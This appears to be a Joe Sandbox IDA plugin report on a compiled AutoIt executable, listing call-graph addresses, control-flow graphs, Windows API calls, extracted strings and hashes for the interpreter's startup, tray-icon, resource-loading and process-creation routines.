7ff79783b26c 4 API calls 95786->95787 95787->95780 95787->95785 95787->95786 95790 7ff79783abe0 81 API calls 2 library calls 95787->95790 95788->95310 95789->95312 95790->95787 95791->95322 95793 7ff797833b40 95792->95793 95796 7ff79787ba0e 95792->95796 95797 7ff797839a64 95793->95797 95795 7ff797833b58 95795->95326 95798 7ff797839a69 95797->95798 95799 7ff797839a9e 95797->95799 95798->95799 95801 7ff79786b3c0 95798->95801 95799->95795 95802 7ff79786b3f5 Concurrency::details::SchedulerProxy::DeleteThis 95801->95802 95803 7ff79786b3c5 RtlFreeHeap 95801->95803 95802->95798 95803->95802 95804 7ff79786b3e0 95803->95804 95807 7ff7978655d4 15 API calls abort 95804->95807 95806 7ff79786b3e5 GetLastError 95806->95802 95807->95806 95808 7ff797835dec 95809 7ff797835df4 95808->95809 95810 7ff797835e98 95809->95810 95811 7ff797835e28 95809->95811 95830 7ff797835e96 95809->95830 95813 7ff79787c229 95810->95813 95814 7ff797835e9e 95810->95814 95815 7ff797835f21 PostQuitMessage 95811->95815 95816 7ff797835e35 95811->95816 95812 7ff797835e6b DefWindowProcW 95818 7ff797835e7c 95812->95818 95858 7ff79784ede4 8 API calls 95813->95858 95819 7ff797835ecc SetTimer RegisterWindowMessageW 95814->95819 95820 7ff797835ea5 95814->95820 95815->95818 95821 7ff797835e40 95816->95821 95822 7ff79787c2af 95816->95822 95819->95818 95827 7ff797835efc CreatePopupMenu 95819->95827 95825 7ff797835eae KillTimer 95820->95825 95826 7ff79787c1b8 95820->95826 95828 7ff797835e49 95821->95828 95829 7ff797835f2b 95821->95829 95870 7ff7978aa40c 16 API calls memcpy_s 95822->95870 95824 7ff79787c255 95859 7ff797852c44 47 API calls Concurrency::wait 95824->95859 95850 7ff797835d88 95825->95850 95834 7ff79787c1bd 95826->95834 95835 7ff79787c1f7 MoveWindow 95826->95835 95827->95818 95828->95830 95837 7ff797835f0b 95828->95837 95838 7ff797835e5f 95828->95838 95856 7ff797854610 9 API calls memcpy_s 95829->95856 95830->95812 95831 7ff79787c2c3 95831->95812 95831->95818 95840 7ff79787c1e4 SetFocus 95834->95840 95841 7ff79787c1c2 95834->95841 95835->95818 95855 7ff797835f3c 26 API calls memcpy_s 95837->95855 95838->95812 95847 7ff797835d88 Shell_NotifyIconW 95838->95847 95839 7ff797835f1f 95839->95818 95840->95818 95841->95838 95844 7ff79787c1cb 95841->95844 95857 7ff79784ede4 8 API calls 95844->95857 95848 7ff79787c280 95847->95848 95860 7ff797836258 95848->95860 95851 7ff797835d99 memcpy_s 95850->95851 95852 7ff797835de4 95850->95852 95853 7ff797835db8 Shell_NotifyIconW 95851->95853 95854 7ff797837098 DeleteObject DestroyWindow Concurrency::wait 95852->95854 95853->95852 95854->95818 95855->95839 95856->95839 95857->95818 95858->95824 95859->95838 95861 7ff797836287 memcpy_s 95860->95861 95871 7ff7978361c4 95861->95871 95864 7ff79783632d 95866 7ff79783634e Shell_NotifyIconW 95864->95866 95867 7ff79787c644 Shell_NotifyIconW 95864->95867 95875 7ff7978372c8 95866->95875 95869 7ff797836365 95869->95830 95870->95831 95872 7ff79787c5f8 95871->95872 95873 7ff7978361e0 95871->95873 95872->95873 95874 7ff79787c602 DestroyIcon 95872->95874 95873->95864 95897 7ff7978aad94 39 API calls wcsftime 95873->95897 95874->95873 95876 7ff7978373bc Concurrency::wait 95875->95876 95877 7ff7978372f4 95875->95877 95876->95869 95878 7ff7978398e8 4 API calls 95877->95878 95879 7ff797837303 95878->95879 95880 7ff79787cdfc LoadStringW 95879->95880 95881 7ff797837310 95879->95881 95883 7ff79787ce1e 95880->95883 95882 7ff797837cf4 4 API calls 95881->95882 95884 7ff797837324 95882->95884 95885 7ff79783e0a8 4 API calls 95883->95885 95886 7ff797837336 95884->95886 95887 7ff79787ce30 95884->95887 95893 7ff79783734f memcpy_s wcscpy 95885->95893 95886->95883 95888 7ff797837343 95886->95888 95889 7ff797837c24 4 API calls 95887->95889 95890 7ff797837c24 4 API calls 95888->95890 95891 7ff79787ce3c 95889->95891 95890->95893 95892 7ff7978371f8 4 API calls 95891->95892 95891->95893 95894 7ff79787ce63 95892->95894 95895 7ff7978373a3 Shell_NotifyIconW 95893->95895 95896 7ff7978371f8 4 API calls 95894->95896 95895->95876 95896->95893 95897->95864 95898 7ff7978447e1 95899 7ff797844d57 95898->95899 95903 7ff7978447f2 95898->95903 95900 7ff79783ee20 18 API calls 95899->95900 95901 7ff797844d66 95900->95901 95902 7ff79783ee20 18 API calls 95901->95902 95905 7ff797844df3 95902->95905 95903->95901 95904 7ff797844862 95903->95904 95903->95905 95907 7ff7978466c0 300 API calls 95904->95907 95911 7ff797843c80 95904->95911 95929 7ff7978b0978 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 95905->95929 95907->95911 95908 7ff7978905be 95931 7ff7978b34e4 77 API calls 3 library calls 95908->95931 95909 7ff797843dde 95911->95908 95911->95909 95912 7ff797844a8f 95911->95912 95915 7ff797844aa9 95911->95915 95916 7ff797844fe7 95911->95916 95918 7ff7978550b4 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent _Init_thread_footer 95911->95918 95921 7ff79783e0a8 4 API calls 95911->95921 95925 7ff797855114 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 95911->95925 95926 7ff797854f0c 34 API calls __scrt_initialize_thread_safe_statics 95911->95926 95927 7ff797839640 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 95911->95927 95928 7ff797845360 300 API calls Concurrency::wait 95911->95928 95930 7ff7978b34e4 77 API calls 3 library calls 95911->95930 95912->95915 95919 7ff79788fefe 95912->95919 95923 7ff797844ac0 95912->95923 95914 7ff7978905d1 95917 7ff79783e0a8 4 API calls 95915->95917 95915->95923 95920 7ff79783e0a8 4 API calls 95916->95920 95917->95909 95918->95911 95922 7ff79783e0a8 4 API calls 95919->95922 95920->95909 95921->95911 95922->95923 95925->95911 95926->95911 95927->95911 95928->95911 95929->95911 95930->95911 95931->95914

                                                                            Control-flow Graph

                                                                            APIs
                                                                            • GetCurrentDirectoryW.KERNEL32(?,?,?,?,?,00007FF797833785), ref: 00007FF7978337F2
                                                                            • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00007FF797833785), ref: 00007FF797833807
                                                                            • GetFullPathNameW.KERNEL32(?,?,?,?,?,00007FF797833785), ref: 00007FF79783388D
                                                                              • Part of subcall function 00007FF797833F9C: GetFullPathNameW.KERNEL32(D000000000000000,00007FF7978338BF,?,?,?,?,?,00007FF797833785), ref: 00007FF797833FFD
                                                                            • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,00007FF797833785), ref: 00007FF797833924
                                                                            • MessageBoxA.USER32 ref: 00007FF79787B888
                                                                            • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,00007FF797833785), ref: 00007FF79787B8E1
                                                                            • GetForegroundWindow.USER32(?,?,?,?,?,00007FF797833785), ref: 00007FF79787B968
                                                                            • ShellExecuteW.SHELL32 ref: 00007FF79787B98F
                                                                              • Part of subcall function 00007FF797833B84: GetSysColorBrush.USER32 ref: 00007FF797833B9E
                                                                              • Part of subcall function 00007FF797833B84: LoadCursorW.USER32 ref: 00007FF797833BAE
                                                                              • Part of subcall function 00007FF797833B84: LoadIconW.USER32 ref: 00007FF797833BC3
                                                                              • Part of subcall function 00007FF797833B84: LoadIconW.USER32 ref: 00007FF797833BDC
                                                                              • Part of subcall function 00007FF797833B84: LoadIconW.USER32 ref: 00007FF797833BF5
                                                                              • Part of subcall function 00007FF797833B84: LoadImageW.USER32 ref: 00007FF797833C21
                                                                              • Part of subcall function 00007FF797833B84: RegisterClassExW.USER32 ref: 00007FF797833C85
                                                                              • Part of subcall function 00007FF797833CBC: CreateWindowExW.USER32 ref: 00007FF797833D0C
                                                                              • Part of subcall function 00007FF797833CBC: CreateWindowExW.USER32 ref: 00007FF797833D5F
                                                                              • Part of subcall function 00007FF797833CBC: ShowWindow.USER32 ref: 00007FF797833D75
                                                                              • Part of subcall function 00007FF797836258: Shell_NotifyIconW.SHELL32 ref: 00007FF797836350
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1702339126.00007FF797831000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF797830000, based on PE: true
                                                                            • Associated: 00000000.00000002.1702322584.00007FF797830000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF7978E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF797908000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702479678.00007FF79791A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702496489.00007FF797924000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7ff797830000_file.jbxd
                                                                            Similarity
                                                                            • API ID: Load$IconWindow$CurrentDirectory$CreateFullNamePath$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell_Show
                                                                            • String ID: This is a third-party compiled AutoIt script.$runas
                                                                            • API String ID: 1593035822-3287110873
                                                                            • Opcode ID: c3ded298cf76d34180cf113abdbd9d12434cc4ac29103e584319df50cc10e3ad
                                                                            • Instruction ID: 09d9f56cbac6fe4c438a4fab82b28e4cf22fd1e84ad14f2e9b828d1225641d03
                                                                            • Opcode Fuzzy Hash: c3ded298cf76d34180cf113abdbd9d12434cc4ac29103e584319df50cc10e3ad
                                                                            • Instruction Fuzzy Hash: 1871F961A1C68395EA30BB38E8409F9AB65FF413E4FC10135E54D476A6EE6CE65BC320

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 352 7ff797836580-7ff7978365fc call 7ff797854c68 call 7ff797836c98 call 7ff797855d00 359 7ff797836737-7ff79783673a 352->359 360 7ff797836602-7ff797836606 352->360 361 7ff79787c9f5-7ff79787c9fd call 7ff7978b2e00 359->361 362 7ff797836740-7ff797836753 CreateStreamOnHGlobal 359->362 363 7ff79783660c-7ff797836617 call 7ff797865514 360->363 364 7ff79787ca03-7ff79787ca1e 360->364 361->364 362->360 365 7ff797836759-7ff797836777 FindResourceExW 362->365 373 7ff79783661b-7ff79783664e call 7ff7978367d8 363->373 374 7ff79787ca27-7ff79787ca60 call 7ff797836810 call 7ff7978367d8 364->374 365->360 369 7ff79783677d 365->369 372 7ff79787c97e-7ff79787c991 LoadResource 369->372 372->360 375 7ff79787c997-7ff79787c9a8 SizeofResource 372->375 382 7ff7978366e8 373->382 383 7ff797836654-7ff79783665f 373->383 387 7ff7978366ee 374->387 395 7ff79787ca66 374->395 375->360 378 7ff79787c9ae-7ff79787c9ba LockResource 375->378 378->360 381 7ff79787c9c0-7ff79787c9f0 378->381 381->360 382->387 384 7ff7978366ae-7ff7978366b2 383->384 385 7ff797836661-7ff79783666f 383->385 384->382 389 7ff7978366b4-7ff7978366cf call 7ff797836810 384->389 388 7ff797836670-7ff79783667d 385->388 392 7ff7978366f1-7ff797836715 387->392 393 7ff797836680-7ff79783668f 388->393 389->373 396 7ff797836729-7ff797836736 392->396 397 7ff797836717-7ff797836724 call 7ff797854c24 * 2 392->397 399 7ff797836691-7ff797836695 393->399 400 7ff7978366d4-7ff7978366dd 393->400 395->392 397->396 399->374 404 7ff79783669b-7ff7978366a8 399->404 405 7ff797836782-7ff79783678c 400->405 406 7ff7978366e3-7ff7978366e6 400->406 404->388 408 7ff7978366aa 404->408 409 7ff797836797-7ff7978367a1 405->409 410 7ff79783678e 405->410 406->399 408->384 411 7ff7978367ce 409->411 412 7ff7978367a3-7ff7978367ad 409->412 410->409 411->372 413 7ff7978367af-7ff7978367bb 412->413 414 7ff7978367c6 412->414 413->393 415 7ff7978367c1 413->415 414->411 415->414
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1702339126.00007FF797831000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF797830000, based on PE: true
                                                                            • Associated: 00000000.00000002.1702322584.00007FF797830000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF7978E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF797908000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702479678.00007FF79791A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702496489.00007FF797924000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7ff797830000_file.jbxd
                                                                            Similarity
                                                                            • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                                                            • String ID: AU3!$EA06$SCRIPT
                                                                            • API String ID: 3051347437-2925976212
                                                                            • Opcode ID: c5d37f60bfc7894d4b9a8be49c3cd5d9515b251465fe095e3cb93f9b28233333
                                                                            • Instruction ID: 990588fb1f9f2f1ed07c553e99a0a3f680947a08ab83451792692681d30ff600
                                                                            • Opcode Fuzzy Hash: c5d37f60bfc7894d4b9a8be49c3cd5d9515b251465fe095e3cb93f9b28233333
                                                                            • Instruction Fuzzy Hash: 7491CEB2B09641C6EB34AB3A9444E7CAFA4BB45BC4FC14135DE5E47785EF38E4568320

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 482 7ff797851d80-7ff797851e17 call 7ff797839640 GetVersionExW call 7ff797837cf4 487 7ff797899450 482->487 488 7ff797851e1d 482->488 490 7ff797899457-7ff79789945d 487->490 489 7ff797851e20-7ff797851e46 call 7ff79783dda4 488->489 495 7ff797851e4c 489->495 496 7ff797851fc1 489->496 492 7ff797899463-7ff797899480 490->492 492->492 494 7ff797899482-7ff797899485 492->494 494->489 497 7ff79789948b-7ff797899491 494->497 498 7ff797851e53-7ff797851e59 495->498 496->487 497->490 499 7ff797899493 497->499 500 7ff797851e5f-7ff797851e7c 498->500 501 7ff797899498-7ff7978994a1 499->501 500->500 502 7ff797851e7e-7ff797851e81 500->502 501->498 503 7ff7978994a7 501->503 502->501 504 7ff797851e87-7ff797851ed6 call 7ff79783dda4 502->504 503->496 507 7ff797851edc-7ff797851ede 504->507 508 7ff797899645-7ff79789964d 504->508 511 7ff797851ee4-7ff797851efa 507->511 512 7ff7978994ac-7ff7978994af 507->512 509 7ff79789964f-7ff797899658 508->509 510 7ff79789965a-7ff79789965d 508->510 515 7ff797899686-7ff797899692 509->515 510->515 516 7ff79789965f-7ff797899674 510->516 517 7ff797899572-7ff797899579 511->517 518 7ff797851f00-7ff797851f02 511->518 513 7ff797851f3c-7ff797851f80 GetCurrentProcess IsWow64Process call 7ff797856240 512->513 514 7ff7978994b5-7ff797899501 512->514 527 7ff79789969d-7ff7978996b3 call 7ff7978a32f4 513->527 539 7ff797851f86-7ff797851f8b GetSystemInfo 513->539 514->513 520 7ff797899507-7ff79789950e 514->520 515->527 521 7ff79789967f 516->521 522 7ff797899676-7ff79789967d 516->522 523 7ff797899589-7ff797899599 517->523 524 7ff79789957b-7ff797899584 517->524 525 7ff797851f08-7ff797851f0b 518->525 526 7ff79789959e-7ff7978995b3 518->526 533 7ff797899510-7ff797899518 520->533 534 7ff797899534-7ff79789953c 520->534 521->515 522->515 523->513 524->513 528 7ff797851f11-7ff797851f2d 525->528 529 7ff7978995ed-7ff7978995f0 525->529 530 7ff7978995c3-7ff7978995d3 526->530 531 7ff7978995b5-7ff7978995be 526->531 550 7ff7978996b5-7ff7978996d5 call 7ff7978a32f4 527->550 551 7ff7978996d7-7ff7978996dc GetSystemInfo 527->551 536 7ff7978995d8-7ff7978995e8 528->536 537 7ff797851f33 528->537 529->513 538 7ff7978995f6-7ff797899620 529->538 530->513 531->513 540 7ff797899526-7ff79789952f 533->540 541 7ff79789951a-7ff797899521 533->541 542 7ff79789954c-7ff797899554 534->542 543 7ff79789953e-7ff797899547 534->543 536->513 537->513 545 7ff797899630-7ff797899640 538->545 546 7ff797899622-7ff79789962b 538->546 547 7ff797851f91-7ff797851fc0 539->547 540->513 541->513 548 7ff797899564-7ff79789956d 542->548 549 7ff797899556-7ff79789955f 542->549 543->513 545->513 546->513 548->513 549->513 553 7ff7978996e2-7ff7978996ea 550->553 551->553 553->547 555 7ff7978996f0-7ff7978996f7 FreeLibrary 553->555 555->547
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1702339126.00007FF797831000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF797830000, based on PE: true
                                                                            • Associated: 00000000.00000002.1702322584.00007FF797830000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF7978E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF797908000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702479678.00007FF79791A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702496489.00007FF797924000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7ff797830000_file.jbxd
                                                                            Similarity
                                                                            • API ID: Process$CurrentInfoSystemVersionWow64
                                                                            • String ID: |O
                                                                            • API String ID: 1568231622-607156228
                                                                            • Opcode ID: ec54e35f865d5c9bd0249927ea89c9316792baffd49f7d05aa477cb653b26fcc
                                                                            • Instruction ID: 131d03e441acbbb48827a8eab3da0fe5bd92b3c53c26667e77225ec41d6f33b5
                                                                            • Opcode Fuzzy Hash: ec54e35f865d5c9bd0249927ea89c9316792baffd49f7d05aa477cb653b26fcc
                                                                            • Instruction Fuzzy Hash: A7D17D21E1D28389EA31BB38A800975AF90EF617E4FD28076D58D026A5EF6CB513C731

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 719 7ff7978cf630-7ff7978cf69e call 7ff797856240 722 7ff7978cf6d4-7ff7978cf6d9 719->722 723 7ff7978cf6a0-7ff7978cf6b8 call 7ff79783ffbc 719->723 725 7ff7978cf6db-7ff7978cf6ef call 7ff79783ffbc 722->725 726 7ff7978cf71e-7ff7978cf723 722->726 732 7ff7978cf708-7ff7978cf70d 723->732 733 7ff7978cf6ba-7ff7978cf6d2 call 7ff79783ffbc 723->733 739 7ff7978cf6f3-7ff7978cf706 call 7ff79783ffbc 725->739 727 7ff7978cf725-7ff7978cf729 726->727 728 7ff7978cf736-7ff7978cf75c call 7ff79783d4cc call 7ff79783e330 726->728 731 7ff7978cf72d-7ff7978cf732 call 7ff79783ffbc 727->731 748 7ff7978cf840-7ff7978cf84a 728->748 749 7ff7978cf762-7ff7978cf7cf call 7ff79783d4cc call 7ff79783e330 call 7ff79783d4cc call 7ff79783e330 call 7ff79783d4cc call 7ff79783e330 728->749 731->728 740 7ff7978cf70f-7ff7978cf717 732->740 741 7ff7978cf719-7ff7978cf71c 732->741 733->739 739->726 739->732 740->731 741->726 741->728 750 7ff7978cf84c-7ff7978cf86e call 7ff79783d4cc call 7ff79783e330 748->750 751 7ff7978cf87d-7ff7978cf8af GetCurrentDirectoryW call 7ff797854c68 GetCurrentDirectoryW 748->751 798 7ff7978cf806-7ff7978cf83e GetSystemDirectoryW call 7ff797854c68 GetSystemDirectoryW 749->798 799 7ff7978cf7d1-7ff7978cf7f3 call 7ff79783d4cc call 7ff79783e330 749->799 750->751 769 7ff7978cf870-7ff7978cf87b call 7ff797858d58 750->769 760 7ff7978cf8b5-7ff7978cf8b8 751->760 763 7ff7978cf8f0-7ff7978cf8ff call 7ff7978af464 760->763 764 7ff7978cf8ba-7ff7978cf8eb call 7ff79784f688 * 3 760->764 776 7ff7978cf905-7ff7978cf95d call 7ff7978afddc call 7ff7978afca8 call 7ff7978afafc 763->776 777 7ff7978cf901-7ff7978cf903 763->777 764->763 769->751 769->763 781 7ff7978cf964-7ff7978cf96c 776->781 806 7ff7978cf95f 776->806 777->781 783 7ff7978cfa0f-7ff7978cfa4b CreateProcessW 781->783 784 7ff7978cf972-7ff7978cfa0d call 7ff79789d1f8 call 7ff797858d58 * 3 call 7ff797854c24 * 3 781->784 788 7ff7978cfa4f-7ff7978cfa62 call 7ff797854c24 * 2 783->788 784->788 811 7ff7978cfa64-7ff7978cfabc call 7ff797834afc * 2 GetLastError call 7ff79784f214 call 7ff7978413e0 788->811 812 7ff7978cfabe-7ff7978cfaca CloseHandle 788->812 798->760 799->798 825 7ff7978cf7f5-7ff7978cf800 call 7ff797858d58 799->825 806->781 827 7ff7978cfb3b-7ff7978cfb65 call 7ff7978af51c 811->827 815 7ff7978cfaf5-7ff7978cfafc 812->815 816 7ff7978cfacc-7ff7978cfaf0 call 7ff7978af7dc call 7ff7978b0088 call 7ff7978cfb68 812->816 821 7ff7978cfb0c-7ff7978cfb35 call 7ff7978413e0 CloseHandle 815->821 822 7ff7978cfafe-7ff7978cfb0a 815->822 816->815 821->827 822->827 825->760 825->798
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1702339126.00007FF797831000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF797830000, based on PE: true
                                                                            • Associated: 00000000.00000002.1702322584.00007FF797830000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF7978E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF797908000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702479678.00007FF79791A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702496489.00007FF797924000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7ff797830000_file.jbxd
                                                                            Similarity
                                                                            • API ID: Directory$Handle$CloseCurrentLockSyncSystem$CreateErrorLastProcess
                                                                            • String ID:
                                                                            • API String ID: 1787492119-0
                                                                            • Opcode ID: 24d3ae7d1d8ea900f01d81b2f37a51b4951de3a31202b8787ffcb64f949d5a4b
                                                                            • Instruction ID: fc90016a6f0212cee6b8a0a84168f0bd1ad3a1be70491f4cdad970272a9a556d
                                                                            • Opcode Fuzzy Hash: 24d3ae7d1d8ea900f01d81b2f37a51b4951de3a31202b8787ffcb64f949d5a4b
                                                                            • Instruction Fuzzy Hash: 18E19122B08B4185EB20EB36D5506BDBBA0FB84BD4F844536EE5D477A9DF38E426C710
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1702339126.00007FF797831000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF797830000, based on PE: true
                                                                            • Associated: 00000000.00000002.1702322584.00007FF797830000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF7978E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF797908000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702479678.00007FF79791A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702496489.00007FF797924000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7ff797830000_file.jbxd
                                                                            Similarity
                                                                            • API ID: Init_thread_footer
                                                                            • String ID: Variable must be of type 'Object'.
                                                                            • API String ID: 1385522511-109567571
                                                                            • Opcode ID: 964c9efeee15d1b20541a3be920371a0534f8302fe66a62436ad536660fe7a46
                                                                            • Instruction ID: e9339a8922cc62ba1bf03434e2b057322f05d0a7547059335954dc89671cfaad
                                                                            • Opcode Fuzzy Hash: 964c9efeee15d1b20541a3be920371a0534f8302fe66a62436ad536660fe7a46
                                                                            • Instruction Fuzzy Hash: E9C29132A08A8286EB70EF25D441AB9BB61FB54BD4FD44131DA4E57B95CF7CE862C310

                                                                            Control-flow Graph

                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1702339126.00007FF797831000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF797830000, based on PE: true
                                                                            • Associated: 00000000.00000002.1702322584.00007FF797830000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF7978E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF797908000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702479678.00007FF79791A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702496489.00007FF797924000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7ff797830000_file.jbxd
                                                                            Similarity
                                                                            • API ID: NameQueryValuewcscat$CloseFileFullModuleOpenPath
                                                                            • String ID: Include$Software\AutoIt v3\AutoIt$\Include\
                                                                            • API String ID: 2667193904-1575078665
                                                                            • Opcode ID: 76c9a1b4bd2bf018c4c0ae9c3e411050a532064aa24ec561f7829367f658b77e
                                                                            • Instruction ID: 14c216cdb34a02be29f457afb615e55e26969ee52a52b2b369f59ae1004ab168
                                                                            • Opcode Fuzzy Hash: 76c9a1b4bd2bf018c4c0ae9c3e411050a532064aa24ec561f7829367f658b77e
                                                                            • Instruction Fuzzy Hash: AD915B22A18A8395EB30FB34E8418B9A764FF847D4FC10132E54D47AA5EF7CE656C760

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 131 7ff797835dec-7ff797835e21 133 7ff797835e91-7ff797835e94 131->133 134 7ff797835e23-7ff797835e26 131->134 133->134 135 7ff797835e96 133->135 136 7ff797835e98 134->136 137 7ff797835e28-7ff797835e2f 134->137 138 7ff797835e6b-7ff797835e76 DefWindowProcW 135->138 139 7ff79787c229-7ff79787c261 call 7ff79784ede4 call 7ff797852c44 136->139 140 7ff797835e9e-7ff797835ea3 136->140 141 7ff797835f21-7ff797835f29 PostQuitMessage 137->141 142 7ff797835e35-7ff797835e3a 137->142 144 7ff797835e7c-7ff797835e90 138->144 175 7ff79787c267-7ff79787c26e 139->175 146 7ff797835ecc-7ff797835efa SetTimer RegisterWindowMessageW 140->146 147 7ff797835ea5-7ff797835ea8 140->147 145 7ff797835ec8-7ff797835eca 141->145 148 7ff797835e40-7ff797835e43 142->148 149 7ff79787c2af-7ff79787c2c5 call 7ff7978aa40c 142->149 145->144 146->145 154 7ff797835efc-7ff797835f09 CreatePopupMenu 146->154 152 7ff797835eae-7ff797835ebe KillTimer call 7ff797835d88 147->152 153 7ff79787c1b8-7ff79787c1bb 147->153 155 7ff797835e49-7ff797835e4e 148->155 156 7ff797835f2b-7ff797835f3a call 7ff797854610 148->156 149->145 167 7ff79787c2cb 149->167 172 7ff797835ec3 call 7ff797837098 152->172 162 7ff79787c1bd-7ff79787c1c0 153->162 163 7ff79787c1f7-7ff79787c224 MoveWindow 153->163 154->145 157 7ff79787c292-7ff79787c299 155->157 158 7ff797835e54-7ff797835e59 155->158 156->145 157->138 173 7ff79787c29f-7ff79787c2aa call 7ff79789c54c 157->173 165 7ff797835f0b-7ff797835f1f call 7ff797835f3c 158->165 166 7ff797835e5f-7ff797835e65 158->166 170 7ff79787c1e4-7ff79787c1f2 SetFocus 162->170 171 7ff79787c1c2-7ff79787c1c5 162->171 163->145 165->145 166->138 166->175 167->138 170->145 171->166 176 7ff79787c1cb-7ff79787c1df call 7ff79784ede4 171->176 172->145 173->138 175->138 180 7ff79787c274-7ff79787c28d call 7ff797835d88 call 7ff797836258 175->180 176->145 180->138
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1702339126.00007FF797831000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF797830000, based on PE: true
                                                                            • Associated: 00000000.00000002.1702322584.00007FF797830000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF7978E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF797908000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702479678.00007FF79791A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702496489.00007FF797924000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7ff797830000_file.jbxd
                                                                            Similarity
                                                                            • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                                            • String ID: TaskbarCreated
                                                                            • API String ID: 129472671-2362178303
                                                                            • Opcode ID: 1235ebd7e81448e07564660c9660bef83c799ad38fc0a315f2003c32225d847e
                                                                            • Instruction ID: 595dd7e19a25f506232d5ab0b91a5463a9843f6704a1074a057f2ad4beedf8c7
                                                                            • Opcode Fuzzy Hash: 1235ebd7e81448e07564660c9660bef83c799ad38fc0a315f2003c32225d847e
                                                                            • Instruction Fuzzy Hash: 24514431A0C64781FA30BB3CE958A79EB95AF45BD0FD50631D44E836A1DE6CF5678320

